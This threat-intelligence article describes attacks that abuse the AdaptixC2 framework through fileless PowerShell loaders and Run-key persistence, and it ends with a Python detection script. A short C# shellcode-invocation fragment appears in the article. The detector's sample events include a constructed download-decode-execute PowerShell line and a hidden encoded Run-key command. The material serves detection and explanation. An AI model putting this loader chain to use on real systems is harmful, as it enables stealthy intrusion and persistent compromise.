Threat Actors Exploit Open-Source AdaptixC2 Framework in Sophisticated Cyber Attacks

In May 2025, cybersecurity experts observed a significant uptick in cyber attacks utilizing AdaptixC2, an open-source command-and-control (C2) framework originally designed for penetration testing. This tool offers functionalities such as file system manipulation, process enumeration, and covert channel tunneling. Its modular architecture and extensibility through extenders have made it particularly appealing to malicious actors seeking customizable toolkits capable of evading traditional security defenses.

Palo Alto Networks researchers noted that AdaptixC2 remained largely unnoticed until threat intelligence feeds began reporting infections across multiple sectors. One early campaign involved social engineering tactics, where attackers posed as help desk personnel to initiate remote support sessions via Quick Assist. This approach tricked users into executing multi-stage PowerShell loaders, leading to in-memory execution of the beacon without dropping any files, thereby bypassing endpoint detection measures and establishing persistent control over the victim’s system.

As these incidents increased, another cluster of intrusions emerged, involving AI-generated scripts designed to deploy AdaptixC2. Analysts identified stylistic markers—such as numbered comments and verbose output confirmations—that indicated code produced by large language models. These scripts not only downloaded and decrypted Base64-encoded payloads but also utilized .NET’s GetDelegateForFunctionPointer to execute shellcode directly in memory. By leveraging built-in Windows APIs like VirtualProtect and CreateProcess, attackers achieved stealthy deployment and reliable persistence.

The impact of these attacks has been significant. Compromised environments have experienced lateral movement facilitated by SOCKS4/5 tunneling and port forwarding, enabling data exfiltration in small chunks to blend with normal traffic patterns. In one documented case, adversaries combined AdaptixC2 with Fog ransomware in an attack against a financial institution in Asia, demonstrating the framework’s versatility and potential to amplify downstream payloads.

Organizations relying on legacy detection systems found themselves ill-prepared for this modular, evolving threat. The graphical interface of AdaptixC2 allows attackers to map available targets and plan multi-stage operations effectively. Its encrypted configuration parameters—RC4-encrypted payloads stored alongside their keys in the PE header—enable rapid customization of communication profiles.

Infection Mechanism via Fileless PowerShell Loader

One of the most insidious elements of AdaptixC2 deployment is its fileless infection mechanism, executed entirely in memory to evade disk-based defenses. The initial vector often begins with a seemingly innocuous PowerShell script, delivered through a social engineering email or remote support prompt. Upon execution, the script invokes Invoke-RestMethod to retrieve a Base64-encoded shellcode payload from a legitimate cloud storage service.

The script then decodes this payload and calls VirtualAlloc to allocate a memory region with PAGE_EXECUTE_READWRITE permissions. Using reflection and dynamic invocation, the loader constructs a delegate pointing to the shellcode entry point:

```csharp
// Fragment as reported in the article: the loader wraps the allocated shellcode
// region (shellcodePtr) in a delegate and invokes it, so no executable touches disk.
var ptr = Marshal.GetDelegateForFunctionPointer(shellcodePtr, typeof(Action));
((Action)ptr)();
```

This method sidesteps the need for written executables, leaving minimal forensic artifacts. Following successful execution, the script employs CreateShortcut in the user’s Startup folder or writes a Run key to the registry under a familiar name such as “Updater,” ensuring that the beacon survives reboots.

Detection evasion is further enhanced by configurable KillDate and WorkingTime parameters, which limit beacon activity to predefined windows, and by customizable user-agent strings and HTTP headers. Security teams must therefore enrich telemetry with memory-based detections and network-behavior analytics to intercept these in-flight payloads before they fully establish their C2 channels. Continuous monitoring for dynamic invocation APIs and anomalous PowerShell child processes remains critical to disrupting this modern, fileless infection chain.
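The detection guidance above (memory-based telemetry, dynamic-invocation APIs, Run-key persistence) can be expressed as simple triage logic over script-block and autostart events. The following is an added example, not code from the article or from the Palo Alto Networks research; the event records and their field names are constructed for illustration, and the stage names and the `min_stages` threshold are assumptions of this example.

```python
import re

# Constructed sample events, modelled on PowerShell script-block logging and on
# registry Run-key autostart records. They are illustrative, not captured telemetry.
SAMPLE_EVENTS = [
    {"kind": "scriptblock", "host": "ws01", "text":
        "$b = Invoke-RestMethod -Uri https://storage.example/blob; "
        "$s = [Convert]::FromBase64String($b); "
        "$p = $k::VirtualAlloc(0, $s.Length, 0x3000, 0x40); "
        "$d = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($p, [Action]); $d.Invoke()"},
    {"kind": "scriptblock", "host": "ws02", "text":
        "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB | Remove-Item"},
    {"kind": "runkey", "host": "ws01", "value_name": "Updater",
        "command": "powershell.exe -w hidden -enc BASE64_PLACEHOLDER"},
    {"kind": "runkey", "host": "ws03", "value_name": "OneDrive",
        "command": "C:\\Users\\a\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"},
]

# One regex per stage of the fileless chain described in the article. A single
# stage is common in legitimate admin scripts; several co-occurring in one block is not.
STAGES = {
    "download": re.compile(r"Invoke-RestMethod|Invoke-WebRequest|DownloadString", re.I),
    "decode":   re.compile(r"FromBase64String", re.I),
    "memory":   re.compile(r"VirtualAlloc|VirtualProtect", re.I),
    "invoke":   re.compile(r"GetDelegateForFunctionPointer", re.I),
}
SUSPICIOUS_RUN_NAMES = {"updater"}  # the familiar-looking value name the article cites

def score_scriptblock(text):
    """Return the set of loader stages present in one script block."""
    return {name for name, rx in STAGES.items() if rx.search(text)}

def is_fileless_loader(text, min_stages=3):
    """Flag a block when at least min_stages distinct stages appear together."""
    return len(score_scriptblock(text)) >= min_stages

def is_suspicious_runkey(value_name, command):
    """Flag a Run-key entry whose benign-sounding name launches hidden or encoded PowerShell."""
    hidden_ps = re.search(r"powershell(\.exe)?\s.*(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b)", command, re.I)
    return value_name.lower() in SUSPICIOUS_RUN_NAMES and hidden_ps is not None

def triage(events):
    """Apply both detections and return (host, reason) alerts in event order."""
    alerts = []
    for e in events:
        if e["kind"] == "scriptblock" and is_fileless_loader(e["text"]):
            alerts.append((e["host"], "fileless-loader:" + ",".join(sorted(score_scriptblock(e["text"])))))
        elif e["kind"] == "runkey" and is_suspicious_runkey(e["value_name"], e["command"]):
            alerts.append((e["host"], "runkey-persistence:" + e["value_name"]))
    return alerts

if __name__ == "__main__":
    for host, reason in triage(SAMPLE_EVENTS):
        print(host, reason)
```

Run against the constructed events, only host ws01 is flagged, once for the four-stage loader block and once for the "Updater" Run key; the routine cleanup script and the genuine OneDrive autostart pass through.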